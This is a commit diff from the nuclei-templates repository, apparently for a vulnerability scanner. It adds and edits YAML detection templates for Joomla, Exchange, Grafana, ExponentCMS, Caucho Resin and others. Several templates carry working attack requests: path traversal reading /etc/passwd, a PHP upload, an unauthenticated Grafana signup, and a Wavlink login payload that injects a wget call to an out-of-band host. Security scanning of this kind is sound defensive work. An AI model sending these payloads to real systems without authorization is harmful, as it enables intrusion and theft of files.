Merge remote-tracking branch 'origin/master' into dynamic_attributes
commit
dc4cc62629
|
@ -26,7 +26,7 @@ jobs:
|
|||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
||||
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei
|
||||
shell: bash
|
||||
|
||||
- name: Template Validation
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1533
|
||||
|
||||
info:
|
||||
name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12142
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1533
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2036
|
||||
|
||||
info:
|
||||
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/34004
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2036
|
||||
tags: cve,cve2010,lfi,joomla
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -12,7 +12,6 @@ requests:
|
|||
- |
|
||||
POST /rest/issueNav/1/issueTable HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
|
||||
Connection: Close
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||
X-Atlassian-Token: no-check
|
||||
|
|
|
@ -14,16 +14,12 @@ requests:
|
|||
- |
|
||||
POST /cgi-bin/login.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://{{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
|
|
|
@ -15,8 +15,6 @@ requests:
|
|||
POST /dfsms/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Connection: close
|
||||
Content-Length: 66
|
||||
|
||||
|
|
|
@ -14,8 +14,6 @@ requests:
|
|||
GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
|
||||
reference:
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
|
|
|
@ -18,24 +18,12 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2021-38751
|
||||
|
||||
info:
|
||||
name: ExponentCMS <= 2.6 Host Header Injection
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: |
|
||||
A HTTP Host header attack exists in ExponentCMS 2.6
|
||||
and below in /exponent_constants.php. A modified HTTP
|
||||
header can change links on the webpage to an arbitrary value,
|
||||
leading to a possible attack vector for MITM.
|
||||
reference:
|
||||
- https://github.com/exponentcms/exponent-cms/issues/1544
|
||||
- https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64
|
||||
tags: cve,cve2021,exponentcms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}/login/showlogin"
|
||||
headers:
|
||||
Host: "{{randstr}}.tld"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,23 +0,0 @@
|
|||
id: exchange-login
|
||||
|
||||
info:
|
||||
name: Microsoft Exchange login page
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6739
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/owa/auth/logon.aspx'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Exchange Log In</title>'
|
||||
- '<title>Microsoft Exchange - Outlook Web Access</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -15,7 +15,6 @@ requests:
|
|||
headers:
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Language: en-US,en;q=0.9,hi;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: grafana-public-signup
|
||||
|
||||
info:
|
||||
name: Grafana Public Signup
|
||||
author: pdteam
|
||||
severity: medium
|
||||
tags: grafana,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/user/signup/step2 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
content-type: application/json
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
{"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "User sign up completed successfully"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "grafana_sess"
|
||||
- "grafana_user"
|
||||
condition: and
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: springboot-env
|
|||
|
||||
info:
|
||||
name: Detect Springboot Env Actuator
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb,philippedelteil
|
||||
severity: low
|
||||
description: Sensitive environment variables may not be masked
|
||||
tags: springboot,exposure
|
||||
|
@ -36,5 +36,6 @@ requests:
|
|||
- "application/json"
|
||||
- "application/vnd.spring-boot.actuator"
|
||||
- "application/vnd.spring-boot.actuator.v1+json"
|
||||
- "application/vnd.spring-boot.actuator.v2+json"
|
||||
condition: or
|
||||
part: header
|
||||
|
|
|
@ -2,30 +2,31 @@ id: microsoft-exchange-server-detect
|
|||
|
||||
info:
|
||||
name: Microsoft Exchange Server Detect
|
||||
author: pikpikcu
|
||||
author: pikpikcu,dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
|
||||
description: |
|
||||
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
|
||||
description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data.
|
||||
tags: microsoft,exchange,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/owa/auth/logon.aspx"
|
||||
|
||||
matchers-condition: and
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
|
||||
part: all
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Exchange Log In</title>'
|
||||
- '<title>Microsoft Exchange - Outlook Web Access</title>'
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- X-Owa-Version
|
||||
- X_Owa_Version
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: caucho-resin-info-disclosure
|
||||
|
||||
info:
|
||||
name: Caucho Resin Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/exploits/27888
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
|
||||
- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<web-app"
|
||||
- "</web-app>"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -24,26 +24,19 @@ requests:
|
|||
<?php echo md5('rce_test');?>
|
||||
----------------------------835846770881083140190633--
|
||||
|
||||
- |
|
||||
GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: path
|
||||
group: 1
|
||||
internal: true
|
||||
part: body
|
||||
regex:
|
||||
- '/Uploads\\(.*?)"\,"success"'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '3c7cb9f46815a790686b857fdbc4295a'
|
||||
- '"url":"http:'
|
||||
- '"success":1'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.url'
|
|
@ -6,12 +6,8 @@ info:
|
|||
description: A simple workflow that runs all Grafana related nuclei templates on a given target.
|
||||
tags: workflow
|
||||
|
||||
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
|
||||
# Old workflows still remains valid, and will be working with all nuclei versions.
|
||||
|
||||
workflows:
|
||||
|
||||
- template: exposed-panels/grafana-detect.yaml
|
||||
|
||||
subtemplates:
|
||||
- template: default-logins/grafana/grafana-default-credential.yaml
|
||||
- tags: grafana
|
||||
|
|
Loading…
Reference in New Issue